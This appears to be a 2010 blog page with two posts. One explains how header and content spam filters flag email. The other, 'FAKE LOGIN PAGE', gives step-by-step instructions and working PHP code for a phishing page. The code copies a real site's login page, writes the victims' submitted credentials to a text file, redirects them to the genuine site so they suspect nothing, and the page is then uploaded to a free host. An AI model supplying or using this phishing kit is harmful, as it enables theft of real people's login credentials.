Friday 13 August 2010

How do Email Spam Filters Work












If you are the one who works with emails on a daily basis, you are most likely to be using a SPAM FILTER to ease the job of sifting through a large number of spam emails every day. Needless to say that spam filters do make our job a lot simpler by automatically filtering out the spam without which it is almost impossible to manually filter the junk emails that arrive in millions each day. However, it is often necessary to have a basic knowledge of how spam filters work and on what basis they flag an email as spam.

How Spam Filters Work?

There are different kinds of spam filters:

Header Spam Filters

Header spam filters work by examining the header information of a particular email message to check if it appears to have been forged. The header of every email contains information which tells the origin of the email. ie: The incoming email ID and usually the IP address (server address) of the sender. So spammers often forge the header to input a false sender ID and IP address so as to make it difficult to trace them. Thus if an email is supposed to have a forged header or if the same message is found to have been sent to multiple recipients, it is most likely considered as a spam by many filters. This method of spam filtering is often quite effective, however occasionally it may result in some of the requested newsletters from being misdirected into the spam folders.

Content Spam Filters

Content spam filter is one of the most effective and widely used filter to combat spam emails. They use a sophisticated algorithm with a set of pre-defined rules to determine whether a given email is a spam. They work by scanning the entire text/body of the email to search for specific words and patterns that make them resemble a typical spam message. Most content spam filters work based on the following criteria and check to see

1. If the message speaks a lot about money matter. Commonly suspected words include: lottery, discount, offer, bank account, money back guarantee etc.

2. If the message contains adult terms like: viagra, pills, bed, drugs, hot and so on.

3. If there is any sort of urgency. Most spam emails call for an urgency by using terms such as hurry, offer valid till etc.

4. If the message contains a single large image with little or no text then it is often considered as spam by many filters.

Posted by at No comments:

Thursday 12 August 2010

FAKE LOGIN PAGE








I’ve posted about phishing and the techniques attacker’s use to spread their phishing sites. Now, let’s look at how they create these phishing pages in the first place with step-by-step instructions. Knowledge of PHP and HTML will be very useful for creating fake login pages. By reading the rest of this post, you are agreeing to our DISCLAIMER.

  1. Select a target website and navigate to their login page.
  2. Save the whole page by going to File->Save Page As.. (I’m doing this in Firefox and so should you.)
  3. You will now have an HTML file and a folder full of images and maybe some JavaScript files. Rename the HTML file to index.html and create another file called list.txt. This text file will hold the login credentials of the victims.
  4. Create a PHP file and name it “phish.php”.
  5. Paste the following code into the previously made PHP file. This code is what takes the login details and stores it in the file “list.txt” and then redirects to the real website. This way the user will think he put in the wrong login information and will succeed the second time since it is now the real website. 
    Header("Location: http://www.RealSite.com");

    

    $handle = fopen("list.txt", "a");

    

    foreach($_GET as $variable => $value) {

    

    fwrite($handle, $variable);

    fwrite($handle, "=");

    fwrite($handle, $value);

    fwrite($handle, "\r\n");

    }fwrite($handle, "\r\n");

    

    fclose($handle);

    exit;

    ?>

    6. Now we must point the login form in the HTML file to the PHP file. Locate the form code in the HTMl file and change the action link to the PHP file and the method type to GET so that the submitted information is passed through the URL. The HTML code should start with something like this:

    7. Once everything is complete, upload the files to a free webhost that supports PHP.
    8. That’s it! You’ve just created a phishing page.

    UPDATE: If you are using WAMP to test this script, make sure that when you are pointing the index page to the phish page you point it to localhost://folder-its-in/phish.php so that the php file actually gets parsed.



Posted by at No comments:
Subscribe to: Posts (Atom)